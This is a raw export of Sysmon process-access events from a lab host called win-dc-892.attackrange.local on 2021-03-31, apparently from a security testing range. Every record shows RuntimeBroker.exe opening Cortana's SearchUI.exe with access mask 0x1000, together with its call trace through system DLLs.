12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246112C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 